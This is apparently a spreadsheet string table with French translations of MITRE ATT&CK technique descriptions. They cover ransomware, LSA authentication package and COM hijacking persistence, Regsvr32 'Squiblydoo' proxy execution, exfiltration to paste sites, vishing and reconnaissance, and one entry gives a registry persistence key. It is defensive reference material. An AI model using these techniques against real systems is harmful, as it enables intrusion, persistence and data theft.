    <t>Les adversaires peuvent chiffrer les données sur les systèmes cibles ou sur un grand nombre de systèmes d’un réseau pour interrompre la disponibilité des ressources du système et du réseau. Ils peuvent tenter de rendre les données stockées inaccessibles en chiffrant des fichiers ou des données sur des disques locaux et distants et en retenant l’accès à une clé de déchiffrement. Cela peut être fait dans le but d’obtenir une compensation monétaire d’une victime en échange d’un déchiffrement ou d’une clé de déchiffrement (ransomware) ou de rendre des données inaccessibles de manière permanente dans les cas où la clé n’est pas sauvegardée ou transmise. (Référence : US-CERT Ransomware 2016)(Citation : FireEye WannaCry 2017)(Citation : US-CERT NotPetya 2017)(Citation : US-CERT SamSam 2018)
Dans le cas d’un ransomware, il est courant que les fichiers utilisateur courants tels que les documents Office, les PDF, les images, les vidéos, l’audio, le texte et les fichiers de code source soient chiffrés (et souvent renommés et/ou étiquetés avec des marqueurs de fichier spécifiques). Les adversaires peuvent avoir besoin d’employer d’abord d’autres comportements, tels que [Modification des autorisations de fichiers et de répertoires](https://attack.mitre.org/techniques/T1222) ou [Arrêt/Redémarrage du système](https://attack.mitre.org/techniques/T1529), afin de déverrouiller et/ou d’accéder à ces fichiers pour les manipuler. (Référence : CarbonBlack Conti, juillet 2020) Dans certains cas, les adversaires peuvent chiffrer des fichiers système critiques, des partitions de disque et le MBR. (Citation : US-CERT NotPetya 2017) 
Pour maximiser l’impact sur l’organisation cible, les programmes malveillants conçus pour chiffrer les données peuvent disposer de fonctionnalités similaires à celles d’un ver pour se propager sur un réseau en exploitant d’autres techniques d’attaque telles que [Comptes valides](https://attack.mitre.org/techniques/T1078), [Vidage des informations d’identification du système d’exploitation](https://attack.mitre.org/techniques/T1003) et [Partages SMB/Windows Admin](https://attack.mitre.org/techniques/T1021/002). (Citation : FireEye WannaCry 2017)(Citation : US-CERT NotPetya 2017) Les logiciels malveillants de chiffrement peuvent également exploiter la [dégradation interne](https://attack.mitre.org/techniques/T1491/001), par exemple en changeant les fonds d’écran des victimes, ou intimider les victimes en envoyant des notes de rançon ou d’autres messages aux imprimantes connectées (ce que l’on appelle le « bombardement d’impression »). (Citation : NHS Digital Egregor novembre 2020)
Dans les environnements cloud, les objets de stockage des comptes compromis peuvent également être chiffrés. (Citation : Rhino S3 Ransomware Partie 1)
https://attack.mitre.org/techniques/T1486</t>
  </si>
  <si>
    <t>Les adversaires peuvent saper les contrôles de sécurité qui avertissent les utilisateurs des activités non fiables ou empêchent l’exécution de programmes non fiables. Les systèmes d’exploitation et les produits de sécurité peuvent contenir des mécanismes permettant d’identifier les programmes ou les sites Web comme possédant un certain niveau de confiance. Par exemple, un programme autorisé à s’exécuter parce qu’il est signé par un certificat de signature de code valide, un programme qui invite l’utilisateur à émettre un avertissement parce qu’il a un attribut défini pour ne pas être téléchargé à partir d’Internet, ou qui reçoit une indication que vous êtes sur le point de vous connecter à un site non approuvé.
Les adversaires peuvent tenter de subvertir ces mécanismes de confiance. La méthode utilisée par les adversaires dépendra du mécanisme spécifique qu’ils cherchent à subvertir. Les adversaires peuvent effectuer [Modification des autorisations de fichiers et de répertoires](https://attack.mitre.org/techniques/T1222) ou [Modifier le registre](https://attack.mitre.org/techniques/T1112) pour contourner ces contrôles. (Citation : SpectorOps Subverting Trust septembre 2017) Les adversaires peuvent également créer ou voler des certificats de signature de code pour acquérir la confiance des systèmes cibles. (Citation : Securelist Digital Certificates)(Citation : Symantec Digital Certificates)
https://attack.mitre.org/techniques/T1553</t>
  </si>
  <si>
    <t>Les adversaires peuvent tirer parti de l’API &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; pour élever les privilèges en demandant à l’utilisateur de fournir des informations d’identification. (Citation : AppleDocs AuthorizationExecuteWithPrivileges) L’objectif de cette API est de fournir aux développeurs d’applications un moyen simple d’effectuer des opérations avec des privilèges root, par exemple pour l’installation ou la mise à jour d’applications. Cette API ne vérifie pas que le programme demandant les privilèges root provient d’une source fiable ou qu’il a été modifié de manière malveillante. 
Bien que cette API soit obsolète, elle fonctionne toujours entièrement dans les dernières versions de macOS. Lors de l’appel de cette API, l’utilisateur sera invité à entrer ses informations d’identification, mais aucune vérification de l’origine ou de l’intégrité du programme n’est effectuée. Le programme qui appelle l’API peut également charger des fichiers accessibles en écriture dans le monde entier qui peuvent être modifiés pour effectuer un comportement malveillant avec des privilèges élevés.
Les adversaires peuvent abuser &lt;code&gt;de AuthorizationExecuteWithPrivileges&lt;/code&gt; pour obtenir des privilèges root afin d’installer des logiciels malveillants sur les victimes et d’installer des mécanismes de persistance. (Citation : Mort par 1000 installateurs ; tout est cassé !)(Citation : Carbon Black Shlayer février 2019)(Citation : OSX Coldroot RAT) Cette technique peut être combinée avec le [Mascarade](https://attack.mitre.org/techniques/T1036) pour inciter l’utilisateur à accorder des privilèges élevés à un code malveillant. (Citation : Mort par 1000 installateurs ; tout est cassé !)(Citation : Carbon Black Shlayer février 2019) Il a également été démontré que cette technique fonctionne en modifiant les programmes légitimes présents sur la machine qui utilisent cette API. (Citation : Mort par 1000 installateurs ; tout est cassé !)
https://attack.mitre.org/techniques/T1548/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir des informations sur le microprogramme de l’hôte de la victime qui peuvent être utilisées lors du ciblage. Les informations sur le microprogramme de l’hôte peuvent inclure divers détails, tels que le type et les versions d’hôtes spécifiques, qui peuvent être utilisés pour déduire plus d’informations sur les hôtes de l’environnement (par exemple : configuration, objectif, âge/niveau de correctif, etc.).
Les adversaires peuvent recueillir ces informations de différentes manières, par exemple par le biais de l’hameçonnage par le biais de [Phishing for Information](https://attack.mitre.org/techniques/T1598). Les informations sur le micrologiciel de l’hôte ne peuvent être exposées à des adversaires que par le biais d’un ensemble de données en ligne ou d’autres ensembles de données accessibles (par exemple, des offres d’emploi, des cartes de réseau, des rapports d’évaluation, des CV ou des factures d’achat). (Citation : ArsTechnica Intel) La collecte de ces informations peut révéler des possibilités pour d’autres formes de reconnaissance (ex : [Recherche de sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593) ou [Recherche de bases de données techniques ouvertes](https://attack.mitre.org/techniques/T1596)), d’établissement de ressources opérationnelles (ex : [Développer des capacités](https://attack.mitre.org/techniques/T1587) ou [Obtenir des capacités](https://attack.mitre.org/techniques/T1588)), et/ou d’accès initial (ex : [Chaîne d’approvisionnement Compromis](https://attack.mitre.org/techniques/T1195) ou [Exploiter une application publique](https://attack.mitre.org/techniques/T1190)).
https://attack.mitre.org/techniques/T1592/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser un algorithme de chiffrement pour dissimuler le trafic de commande et de contrôle plutôt que de s’appuyer sur les protections inhérentes fournies par un protocole de communication. Malgré l’utilisation d’un algorithme sécurisé, ces implémentations peuvent être vulnérables à l’ingénierie inverse si les clés secrètes sont codées et/ou générées dans des échantillons de logiciels malveillants/fichiers de configuration.
https://attack.mitre.org/techniques/T1573</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des packages d’authentification pour exécuter des DLL au démarrage du système. Les DLL du package d’authentification Windows sont chargées par le processus LSA (Local Security Authority) au démarrage du système. Ils prennent en charge plusieurs processus d’ouverture de session et plusieurs protocoles de sécurité pour le système d’exploitation. (Citation : Packages d’authentification MSDN)
Les adversaires peuvent utiliser le mécanisme de démarrage automatique fourni par les packages d’authentification LSA pour la persistance en plaçant une référence à un fichier binaire dans l’emplacement du registre Windows &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\&lt;/code&gt; avec la valeur de clé &lt;code&gt;« Authentication Packages"=&amp;lt;target binary&amp;gt;&lt;/code&gt;. Le binaire sera alors exécuté par le système lors du chargement des packages d’authentification.
https://attack.mitre.org/techniques/T1547/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de l’exécution Regsvr32.exe proxy de code malveillant. Regsvr32.exe est un programme de ligne de commande utilisé pour enregistrer et annuler l’enregistrement des contrôles de liaison et d’incorporation d’objets, y compris les bibliothèques de liens dynamiques (DLL), sur les systèmes Windows. Le binaire Regsvr32.exe peut également être signé par Microsoft. (Référence : Microsoft Regsvr32)
L’utilisation malveillante de Regsvr32.exe peut éviter de déclencher des outils de sécurité qui peuvent ne pas surveiller l’exécution et le chargement des modules par le processus regsvr32.exe en raison de listes d’autorisation ou de faux positifs de Windows utilisant regsvr32.exe pour des opérations normales. Regsvr32.exe peut également être utilisé pour contourner spécifiquement le contrôle des applications à l’aide de la fonctionnalité de chargement de scriptlets COM pour exécuter des DLL sous les autorisations de l’utilisateur. Étant donné que Regsvr32.exe prend en charge le réseau et le proxy, les scripts peuvent être chargés en passant un localisateur de ressources uniforme (URL) à un fichier sur un serveur Web externe en tant qu’argument lors de l’appel. Cette méthode n’apporte aucune modification au registre, car l’objet COM n’est pas réellement enregistré, mais seulement exécuté. (Référence : LOLBAS Regsvr32) Cette variante de la technique est souvent appelée « Squiblydoo » et a été utilisée dans des campagnes ciblant les gouvernements. (Citation : Noir de carbone Squiblydoo avril 2016) (Citation : FireEye Regsvr32 ciblant le gouvernement mongol)
Regsvr32.exe peut également être utilisé pour enregistrer un objet COM utilisé pour établir la persistance via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation : Noir de carbone Squiblydoo avril 2016)
https://attack.mitre.org/techniques/T1218/010</t>
  </si>
  <si>
    <t>Les adversaires peuvent exfiltrer des données vers des sites de stockage de texte au lieu de leur canal de commande et de contrôle principal. Les sites de stockage de texte, tels que &lt;code&gt;pastebin[.]com&lt;/code&gt;, sont couramment utilisés par les développeurs pour partager du code et d’autres informations.  
Les sites de stockage de texte sont souvent utilisés pour héberger du code malveillant pour la communication C2 (par exemple, [Stage Capabilities](https://attack.mitre.org/techniques/T1608)), mais les adversaires peuvent également utiliser ces sites pour exfiltrer les données collectées. De plus, les fonctionnalités payantes et les options de cryptage peuvent permettre aux adversaires de dissimuler et de stocker des données de manière plus sécurisée. (Citation : Pastebin EchoSec)
**Remarque :** Ceci est distinct de [Exfiltration vers le dépôt de code](https://attack.mitre.org/techniques/T1567/001), qui met en évidence l’accès aux dépôts de code via des API.
https://attack.mitre.org/techniques/T1567/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir des informations sur le logiciel hôte de la victime qui peuvent être utilisées lors du ciblage. Les informations sur les logiciels installés peuvent inclure divers détails tels que les types et les versions sur des hôtes spécifiques, ainsi que la présence de composants supplémentaires qui peuvent indiquer des protections défensives supplémentaires (par exemple, antivirus, SIEM, etc.).
Les adversaires peuvent collecter ces informations de différentes manières, par exemple par le biais d’actions de collecte directes via [Analyse active](https://attack.mitre.org/techniques/T1595) (par exemple, ports d’écoute, bannières de serveur, chaînes d’agent utilisateur) ou [Hameçonnage pour obtenir des informations](https://attack.mitre.org/techniques/T1598). Les adversaires peuvent également compromettre les sites et inclure du contenu malveillant conçu pour collecter des informations sur l’hôte auprès des visiteurs. (Citation : ATT ScanBox) Les informations relatives au logiciel installé peuvent également être exposées à des adversaires via des ensembles de données en ligne ou d’autres ensembles de données accessibles (par exemple, des offres d’emploi, des cartes de réseau, des rapports d’évaluation, des CV ou des factures d’achat). La collecte de ces informations peut révéler des possibilités pour d’autres formes de reconnaissance (ex : [Recherche de sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593) ou [Recherche de bases de données techniques ouvertes](https://attack.mitre.org/techniques/T1596)), d’établissement de ressources opérationnelles (ex : [Développer des capacités](https://attack.mitre.org/techniques/T1587) ou [Obtenir des capacités](https://attack.mitre.org/techniques/T1588)), et/ou pour un accès initial (ex : [Chaîne d’approvisionnement compromis](https://attack.mitre.org/techniques/T1195) ou [services à distance externes](https://attack.mitre.org/techniques/T1133)).
https://attack.mitre.org/techniques/T1592/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des méthodes de capture des entrées de l’utilisateur pour obtenir des informations d’identification ou collecter des informations. Lors d’une utilisation normale du système, les utilisateurs fournissent souvent des informations d’identification à différents emplacements, tels que des pages/portails de connexion ou des boîtes de dialogue système. Les mécanismes de capture d’entrée peuvent être transparents pour l’utilisateur (par exemple, [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004)) ou reposer sur la tromperie de l’utilisateur pour qu’il fournisse des informations dans ce qu’il croit être un véritable service (par exemple, [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)).
https://attack.mitre.org/techniques/T1056</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser les communications vocales pour accéder aux systèmes des victimes. La voix du spearphishing est une variante spécifique du spearphishing. Il diffère des autres formes de harponnage en ce sens qu’il utilise l’utilisation de la manipulation d’un utilisateur pour qu’il fournisse un accès aux systèmes par le biais d’un appel téléphonique ou d’autres formes de communications vocales. Le spearphishing fait souvent appel à des techniques d’ingénierie sociale, telles que se faire passer pour une source fiable (ex : [Usurpation d’identité](https://attack.mitre.org/techniques/T1656)) et/ou créer un sentiment d’urgence ou d’alarme pour le destinataire.
Toutes les formes d’hameçonnage sont transmises par voie électronique. Dans ce scénario, les adversaires n’envoient pas directement des logiciels malveillants à une victime et ne s’appuient pas sur [User Execution](https://attack.mitre.org/techniques/T1204) pour la livraison et l’exécution. Par exemple, les victimes peuvent recevoir des messages d’hameçonnage qui leur demandent d’appeler un numéro de téléphone où elles sont dirigées pour visiter une URL malveillante, télécharger des logiciels malveillants, ou installer des outils de gestion à distance accessibles à l’adversaire ([Logiciel d’accès à distance](https://attack.mitre.org/techniques/T1219)) sur leur ordinateur. (Citation : Unit42 Luna Moth)
Les adversaires peuvent également combiner le phishing vocal avec la [Génération de demandes d’authentification multifacteur](https://attack.mitre.org/techniques/T1621) afin d’inciter les utilisateurs à divulguer des informations d’identification MFA ou à accepter des invites d’authentification. (Citation : Proofpoint Vishing)
https://attack.mitre.org/techniques/T1566/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent développer des exploits qui peuvent être utilisés lors du ciblage. Un exploit tire parti d’un bogue ou d’une vulnérabilité afin de provoquer l’apparition d’un comportement involontaire ou imprévu sur le matériel ou les logiciels informatiques. Plutôt que de trouver/modifier des exploits en ligne ou de les acheter auprès de fournisseurs d’exploits, un adversaire peut développer ses propres exploits. (Citation : NYTStuxnet) Les adversaires peuvent utiliser les informations obtenues via les [Vulnérabilités](https://attack.mitre.org/techniques/T1588/006) pour concentrer les efforts de développement d’exploits. Dans le cadre du processus de développement d’exploits, les adversaires peuvent découvrir des vulnérabilités exploitables par le biais de méthodes telles que le fuzzing et l’analyse des correctifs. (Citation : Irongeek Sims BSides 2017)
Comme pour les efforts de développement légitimes, différents ensembles de compétences peuvent être nécessaires pour développer des exploits. Les compétences nécessaires peuvent être acquises à l’interne ou faire l’objet d’une sous-traitance. Le recours à un sous-traitant peut être considéré comme une extension des capacités de développement d’exploits de cet adversaire, à condition que l’adversaire joue un rôle dans l’élaboration des exigences et maintienne un degré initial d’exclusivité à l’égard de l’exploit.
Les adversaires peuvent utiliser des exploits au cours de diverses phases de leur cycle de vie (c’est-à-dire [Exploiter une application publique](https://attack.mitre.org/techniques/T1190), [Exploiter pour l’exécution du client](https://attack.mitre.org/techniques/T1203), [Exploitation pour l’élévation de privilèges](https://attack.mitre.org/techniques/T1068), [Exploitation pour contourner la défense](https://attack.mitre.org/techniques/T1211), [Exploitation pour l’accès aux informations d’identification]( https://attack.mitre.org/techniques/T1212), [Exploitation de services à distance](https://attack.mitre.org/techniques/T1210) et [Exploitation d’applications ou de systèmes](https://attack.mitre.org/techniques/T1499/004)).
https://attack.mitre.org/techniques/T1587/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher sur les réseaux sociaux des informations sur les victimes qui peuvent être utilisées lors du ciblage. Les sites de médias sociaux peuvent contenir divers renseignements sur une organisation victime, comme des annonces commerciales ainsi que des renseignements sur les rôles, les lieux et les intérêts du personnel.
Les adversaires peuvent effectuer des recherches sur différents sites de médias sociaux en fonction des informations qu’ils cherchent à recueillir. Les auteurs de menace peuvent récolter passivement des données sur ces sites et utiliser les informations recueillies pour créer de faux profils ou groupes afin d’inciter les victimes à révéler des informations spécifiques (c.-à-d. [Service de harponnage](https://attack.mitre.org/techniques/T1598/001)). (Citation : Médias sociaux Cyware) Les informations provenant de ces sources peuvent révéler des possibilités pour d’autres formes de reconnaissance (ex : [Phishing for Information](https://attack.mitre.org/techniques/T1598) ou [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), d’établissement de ressources opérationnelles (ex : [Établissement de comptes](https://attack.mitre.org/techniques/T1585) ou [Compromission de comptes](https://attack.mitre.org/techniques/T1586)), et/ou d’accès initial (ex : [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).
https://attack.mitre.org/techniques/T1593/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent tirer parti d’un logiciel de gestion de la relation client (CRM) pour extraire des informations précieuses. Les logiciels CRM sont utilisés pour aider les organisations à suivre et à gérer les interactions avec les clients, ainsi qu’à stocker les données des clients.
Une fois que les adversaires ont accès à une organisation victime, ils peuvent exploiter le logiciel CRM pour trouver des données client. Il peut s’agir d’informations personnellement identifiables (PII) telles que les noms complets, les adresses e-mail, les numéros de téléphone et les adresses, ainsi que de détails supplémentaires tels que l’historique des achats et les interactions avec le support informatique. En collectant ces données, un adversaire peut être en mesure d’envoyer des e-mails personnalisés (https://attack.mitre.org/techniques/T1566, de procéder à l’échange de cartes SIM ou de cibler les clients de l’organisation de manière à réaliser des gains financiers ou à compromettre d’autres organisations. (Citation : Bleeping Computer US Cellular Hack 2022)(Citation : Bleeping Computer Mint Mobile Hack 2021)(Citation : Bleeping Computer Bank Hack 2020)
Les logiciels CRM peuvent être hébergés sur site ou dans le cloud. Les informations stockées dans ces solutions peuvent varier en fonction de l’instance ou de l’environnement spécifique. Parmi les exemples de logiciels CRM, citons Microsoft Dynamics 365, Salesforce, Zoho, Zendesk et HubSpot.
https://attack.mitre.org/techniques/T1213/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent établir une persistance en exécutant du contenu malveillant déclenché par des références détournées à des objets COM (Component Object Model). COM est un système au sein de Windows permettant l’interaction entre les composants logiciels via le système d’exploitation. (citation : Microsoft Component Object Model)  Les références à divers objets COM sont stockées dans le registre. 
Les adversaires peuvent utiliser le système COM pour insérer un code malveillant qui peut être exécuté à la place d’un logiciel légitime en détournant les références et les relations COM comme moyen de persistance. Le détournement d’un objet COM nécessite une modification du registre pour remplacer une référence à un composant système légitime, ce qui peut empêcher ce composant de fonctionner lors de son exécution. Lorsque ce composant système est exécuté dans le cadre d’un fonctionnement normal du système, le code de l’adversaire est exécuté à la place. (Citation : Détournement de GDATA COM) Un adversaire est susceptible de détourner des objets qui sont utilisés suffisamment fréquemment pour maintenir un niveau de persistance constant, mais il est peu probable qu’il interrompe des fonctionnalités notables du système afin d’éviter une instabilité du système qui pourrait conduire à la détection.
https://attack.mitre.org/techniques/T1546/015</t>
  </si>
  <si>
    <t>Les adversaires peuvent collecter des informations d’identification qui peuvent être utilisées lors du ciblage. Les informations d’identification de compte recueillies par des adversaires peuvent être celles directement associées à l’organisation victime cible ou tenter de tirer parti de la tendance des utilisateurs à utiliser les mêmes mots de passe pour leurs comptes personnels et professionnels.
Les adversaires peuvent recueillir des informations d’identification auprès de victimes potentielles de différentes manières, par exemple par le biais d’une incitation directe par le biais de l’hameçonnage pour obtenir des informations(https://attack.mitre.org/techniques/T1598). Les adversaires peuvent également compromettre des sites puis ajouter du contenu malveillant conçu pour collecter des cookies d’authentification de site Web auprès des visiteurs. (Citation : ATT ScanBox) (Référence : Registre Deloitte)(Citation : Enregistrer Uber)(Citation : Detectify Slack Tokens)(Citation : Forbes GitHub Creds)(Citation : GitHub truffleHog)(Citation : GitHub Gitrob)(Citation : CNET Leaks) Lorsque l’authentification multifacteur (MFA) basée sur des communications hors bande est utilisée, des adversaires peuvent compromettre un fournisseur de services pour accéder aux codes MFA et aux mots de passe à usage unique (OTP). (Citation : Okta Scatter Swine 2022)
Les informations d’identification peuvent également être exposées à des adversaires par le biais de fuites en ligne ou d’autres ensembles de données accessibles (ex : [moteurs de recherche](https://attack.mitre.org/techniques/T1593/002), de vidages de violations, de référentiels de code, etc.). Les adversaires peuvent acheter des identifiants sur les marchés du dark web, tels que Russian Market et 2easy, ou en accédant à des chaînes Telegram qui distribuent des journaux de logiciels malveillants de vol d’informations. (Citation : Bleeping Computer 2easy 2021)(Citation : SecureWorks Infostealers 2023)(Citation : Journaux de voleur d’ordinateur Bleeping 2023)
La collecte de ces informations peut révéler des opportunités pour d’autres formes de reconnaissance (ex : [Recherche de sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593) ou [Phishing pour obtenir des informations](https://attack.mitre.org/techniques/T1598)), la mise en place de ressources opérationnelles (ex : [Comptes compromis](https://attack.mitre.org/techniques/T1586)), et/ou l’accès initial (ex : [Services à distance externes](https://attack.mitre.org/techniques/T1133) ou [Valide Comptabilité](https://attack.mitre.org/techniques/T1078)).
https://attack.mitre.org/techniques/T1589/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent manipuler les logiciels d’application avant qu’ils ne soient reçus par un consommateur final dans le but de compromettre les données ou le système. La compromission de la chaîne d’approvisionnement d’un logiciel peut se faire de plusieurs façons, notamment la manipulation du code source de l’application, la manipulation du mécanisme de mise à jour/distribution de ce logiciel ou le remplacement des versions compilées par une version modifiée.
Le ciblage peut être spécifique à un ensemble de victimes souhaitées ou peut être distribué à un large éventail de consommateurs, mais ne passer qu’à des tactiques supplémentaires visant des victimes spécifiques. (Citation : Avast CCleaner3 2018)(Référence : Command Five SK 2011)
https://attack.mitre.org/techniques/T1195/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent renommer des utilitaires système légitimes pour tenter d’échapper aux mécanismes de sécurité concernant l’utilisation de ces utilitaires. Des mécanismes de surveillance et de contrôle de la sécurité peuvent être mis en place pour les utilitaires système dont les adversaires sont susceptibles d’abuser. (Citation : Site principal de LOLBAS) Il peut être possible de contourner ces mécanismes de sécurité en renommant l’utilitaire avant de l’utiliser (ex : renommer &lt;code&gt;rundll32.exe&lt;/code&gt;). (Citation : Balle de mascarade élastique) Un autre cas se produit lorsqu’un utilitaire légitime est copié ou déplacé vers un autre répertoire et renommé pour éviter les détections basées sur des utilitaires système s’exécutant à partir de chemins d’accès non standard. (Citation : F-Secure CozyDuke)
https://attack.mitre.org/techniques/T1036/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser un service Web externe existant et légitime comme moyen d’envoyer des commandes à un système compromis et d’en recevoir une sortie sur le canal du service Web. Les systèmes compromis peuvent exploiter des sites Web et des médias sociaux populaires pour héberger des instructions de commande et de contrôle (C2). Ces systèmes infectés peuvent ensuite renvoyer le résultat de ces commandes sur ce canal de service Web. Le trafic de retour peut se produire de différentes manières, en fonction du service Web utilisé. Par exemple, le trafic de retour peut prendre la forme d’un commentaire sur un forum, d’un message envoyé par le système compromis à un projet de développement, d’une mise à jour d’un document hébergé sur un service Web ou de l’envoi d’un Tweet. 
Les sites Web populaires et les médias sociaux agissant comme un mécanisme pour C2 peuvent offrir une couverture importante en raison de la probabilité que les hôtes d’un réseau communiquent déjà avec eux avant une compromission. L’utilisation de services courants, tels que ceux proposés par Google ou Twitter, permet aux adversaires de se cacher plus facilement dans le bruit attendu. Les fournisseurs de services Web utilisent généralement le cryptage SSL/TLS, ce qui offre aux adversaires un niveau de protection supplémentaire.
https://attack.mitre.org/techniques/T1102/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent exploiter les vulnérabilités logicielles des applications clientes pour exécuter du code. Des vulnérabilités peuvent exister dans les logiciels en raison de pratiques de codage non sécurisées qui peuvent entraîner un comportement imprévu. Les adversaires peuvent tirer parti de certaines vulnérabilités par le biais d’une exploitation ciblée dans le but d’exécuter du code arbitraire. Souvent, les exploits les plus précieux d’une boîte à outils offensive sont ceux qui peuvent être utilisés pour obtenir l’exécution de code sur un système distant, car ils peuvent être utilisés pour accéder à ce système. Les utilisateurs s’attendent à voir fonctionner des fichiers liés aux applications qu’ils utilisaient habituellement, ils constituent donc une cible utile pour la recherche et le développement d’exploits en raison de leur grande utilité.
Il en existe plusieurs types :
### Exploitation basée sur le navigateur
Les navigateurs Web sont une cible courante par le biais de [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) et de [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Les systèmes de terminaux peuvent être compromis par une navigation Web normale ou par le fait que certains utilisateurs sont ciblés par des liens dans des e-mails de spearphishing vers des sites contrôlés par l’adversaire et utilisés pour exploiter le navigateur Web. Souvent, ils ne nécessitent pas d’action de la part de l’utilisateur pour que l’exploit soit exécuté.
### Applications bureautiques
Les applications bureautiques et de productivité courantes telles que Microsoft Office sont également ciblées par le [Phishing](https://attack.mitre.org/techniques/T1566). Les fichiers malveillants seront transmis directement sous forme de pièces jointes ou par le biais de liens permettant de les télécharger. Ceux-ci nécessitent que l’utilisateur ouvre le document ou le fichier pour que l’exploit s’exécute.
### Applications tierces courantes
D’autres applications courantes ou faisant partie du logiciel déployé dans un réseau cible peuvent également être utilisées à des fins d’exploitation. Des applications telles qu’Adobe Reader et Flash, qui sont courantes dans les environnements d’entreprise, ont été régulièrement ciblées par des adversaires qui tentaient d’accéder aux systèmes. En fonction du logiciel et de la nature de la vulnérabilité, certaines peuvent être exploitées dans le navigateur ou nécessiter l’ouverture d’un fichier par l’utilisateur. Par exemple, certains exploits Flash ont été livrés sous forme d’objets dans des documents Microsoft Office.
https://attack.mitre.org/techniques/T1203</t>
  </si>
  <si>
    <t>Les adversaires peuvent sonder l’infrastructure de manière itérative à l’aide de techniques de force brute et d’exploration. Bien que cette technique utilise des méthodes similaires à celles de la [Brute Force](https://attack.mitre.org/techniques/T1110), son objectif est l’identification du contenu et de l’infrastructure plutôt que la découverte d’informations d’identification valides. Les listes de mots utilisées dans ces analyses peuvent contenir des noms génériques et couramment utilisés et des extensions de fichiers ou des termes spécifiques à un logiciel particulier. Les adversaires peuvent également créer des listes de mots personnalisées et spécifiques à la cible à l’aide de données recueillies à partir d’autres techniques de reconnaissance (ex : [Recueillir des informations sur l’organisation de la victime](https://attack.mitre.org/techniques/T1591), ou [Rechercher des sites Web appartenant à la victime](https://attack.mitre.org/techniques/T1594)).
Par exemple, les adversaires peuvent utiliser des outils de découverte de contenu Web tels que Dirb, DirBuster et GoBuster, ainsi que des listes de mots génériques ou personnalisées pour énumérer les pages et les répertoires d’un site Web. (Citation : ClearSky Lebanese Cedar janvier 2021) Cela peut les aider à découvrir d’anciennes pages vulnérables ou des portails administratifs cachés qui pourraient devenir la cible d’opérations ultérieures (ex : [Exploiter une application publique](https://attack.mitre.org/techniques/T1190) ou [Brute Force](https://attack.mitre.org/techniques/T1110)).  
Étant donné que les solutions de stockage dans le cloud utilisent généralement des noms uniques à l’échelle mondiale, les adversaires peuvent également utiliser des listes de mots et des outils spécifiques à la cible, tels que s3recon et GCPBucketBrute, pour énumérer les compartiments publics et privés sur l’infrastructure cloud. (Citation : S3Recon GitHub)(Citation : GCPBucketBrute) Une fois les objets de stockage découverts, les adversaires peuvent exploiter les [données du stockage dans le cloud](https://attack.mitre.org/techniques/T1530) pour accéder à des informations précieuses qui peuvent être exfiltrées ou utilisées pour élever les privilèges et se déplacer latéralement.
https://attack.mitre.org/techniques/T1595/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent usurper les alertes de sécurité à partir d’outils, en présentant de fausses preuves pour empêcher les défenseurs d’être conscients des activités malveillantes. (Référence : BlackBasta) Les messages produits par les outils défensifs contiennent des informations sur les événements de sécurité potentiels ainsi que sur l’état de fonctionnement du logiciel de sécurité et du système. Les messages de rapport de sécurité sont importants pour surveiller le fonctionnement normal d’un système et identifier les événements importants qui peuvent signaler un incident de sécurité.
Plutôt que ou en plus de [Blocage de l’indicateur](https://attack.mitre.org/techniques/T1562/006), un adversaire peut usurper des affirmations positives selon lesquelles les outils de sécurité continuent de fonctionner même après que des outils de sécurité légitimes ont été désactivés (par exemple, [Désactiver ou modifier les outils](https://attack.mitre.org/techniques/T1562/001)). Un adversaire peut également présenter un système « sain » même après l’infection. Cela peut être utilisé à mauvais escient pour permettre d’autres activités malveillantes en retardant les réponses du défenseur.
Par exemple, les adversaires peuvent afficher une fausse interface graphique de sécurité Windows et une icône de barre d’état avec un état système « sain » après la désactivation de Windows Defender et d’autres outils système. (Référence : BlackBasta)
https://attack.mitre.org/techniques/T1562/011</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de la fonctionnalité de page d’accueil de Microsoft Outlook pour obtenir la persistance sur un système compromis. La page d’accueil Outlook est une fonctionnalité héritée utilisée pour personnaliser la présentation des dossiers Outlook. Cette fonctionnalité permet de charger et de présenter une URL interne ou externe chaque fois qu’un dossier est ouvert. Une page HTML malveillante peut être créée pour exécuter du code lorsqu’elle est chargée par la page d’accueil Outlook. (Citation : Page d’accueil Outlook de SensePost)
Une fois que des pages d’accueil malveillantes ont été ajoutées à la boîte aux lettres de l’utilisateur, elles seront chargées au démarrage d’Outlook. Les pages d’accueil malveillantes s’exécutent lorsque le bon dossier Outlook est chargé/rechargé. (Citation : Page d’accueil Outlook de SensePost)
https://attack.mitre.org/techniques/T1137/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser un algorithme de chiffrement asymétrique connu pour dissimuler le trafic de commande et de contrôle plutôt que de s’appuyer sur les protections inhérentes fournies par un protocole de communication. La cryptographie asymétrique, également connue sous le nom de cryptographie à clé publique, utilise une paire de clés par partie : une publique qui peut être distribuée librement et une privée. En raison de la façon dont les clés sont générées, l’expéditeur crypte les données avec la clé publique du destinataire et le destinataire déchiffre les données avec sa clé privée. Cela garantit que seul le destinataire prévu peut lire les données chiffrées. Les algorithmes de chiffrement à clé publique courants incluent RSA et ElGamal.
